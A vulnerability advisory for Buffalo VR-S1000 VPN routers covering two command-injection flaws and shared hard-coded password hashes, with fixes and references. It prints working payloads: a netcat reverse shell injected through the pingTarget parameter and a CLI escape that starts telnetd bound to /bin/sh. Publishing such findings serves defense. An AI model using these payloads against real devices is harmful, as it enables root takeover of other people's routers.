The VR-S1000 BroadStation Pro device from Buffalo is a VPN router that can build a secure VPN (virtual leased line network) between multiple locations.
All Buffalo VR-S1000 devices from version 2.37
and under.
[CVE-2023-45741] - OS Command Injection.
An authenticated, remote OS Command Injection vulnerability was discovered affecting all Buffalo VR-S1000
Series devices using version 2.37
and under due to an unsafe implementation of the ping command
. This vulnerability exists due to insufficient validation of a process argument in the binary file /www/cgi-bin/platform.fcgi
. A successful exploit could allow an attacker to execute arbitrary commands on the underlying operating system with the root privileges.
[CVE-2023-46681] - SSH CLI Command Injection.
A vulnerability was discovered in the implementation of the CLI (command line interface) of Buffalo VR-S1000 Series
devices running version 2.37
and under which can allow a local attacker with low privileges to perform a command injection attack. This vulnerability exists due to insufficient validation of a process argument in the binary file /usr/sbin/cli
. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges.
[CVE-2023-46711] - Use of weak Hard-coded Cryptographic Key.
By default, all VR-S1000
VPN devices running version 2.37
and under have weak hard-coded MD5crypt
hashes built-in to each device for the mysql
and daemon
users. These hard-coded credentials can easily be recovered after a brute-force attack. This vulnerability could allow an external attacker to escalate privileges.
From the network diagnostics page (ネットワーク診断 ), an authenticated attacker
can tamper with the page while the ping function is executed (/cgi-bin/platform.fcgi?form=fmNetToolPing)
and inject the POST parameter pingTarget
with arbitrary Linux commands. The arbitrary Linux commands will be
interpreted and executed at the same time the ping command is executed.
In the example above, we show that we can take advantage of this
vulnerability to inject a reverse shell payload and let the VPN router
connect back to an attacker controlled device.
Payload used (don't forget to encode the payload):
pingTarget=8.8.8.8`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.0.156 37777 >/tmp/f`
Payload has been successfully executed. We have now full control on the device with root privileges.
When a user connects to the device via Telnet, a custom binary file with limited commands is loaded (/usr/sbin/cli)
. In the example below, we show how it is possible via the ping
command to use a command injection payload and escape the custom CLI
binary and then open another telnetd service that redirects to /bin/sh
on another port.
Payload used
ping ::;$(telnetd${IFS}-l${IFS}/bin/sh${IFS}-p${IFS}2323)
After extracting the firmware image and then reverse engineering it, it was discovered that the file /etc/passwd
has the same built-in MD5crypt hash for the mysql
and deamon
users. These hard-coded credentials can easily be recovered by executing a brute-force attack.
Vulnerability 1 and 2: Strengthen validation rules by checking if input contains only alphanumeric characters. No other syntax or whitespace should be allowed. It is also recommended to use a whitelist of permitted values only. Please see the following link for more details: https://cwe.mitre.org/data/definitions/78.html
Vulnerability 3: Need to generate a different password for each device. During the manufacturing process, set a randomly generated password, unique for each device (e.g. print the password on a sticker for local access). Risk: Since passwords are shared among devices, an attacker able to crack the passwords once (e.g. with physical access to the device) can access all reachable devices. Please see the following link for more details: https://cwe.mitre.org/data/definitions/1188.html
As of 15 Aug 2022, there were 525 Buffalo vr-s1000 BroadStation Pro devices exposed to the internet and were affected by the vulnerabilities discovered.
https://www.buffalo.jp/news/detail/20231225-01.html
https://jvn.jp/en/jp/JVN23771490/
https://jvn.jp/jp/JVN23771490/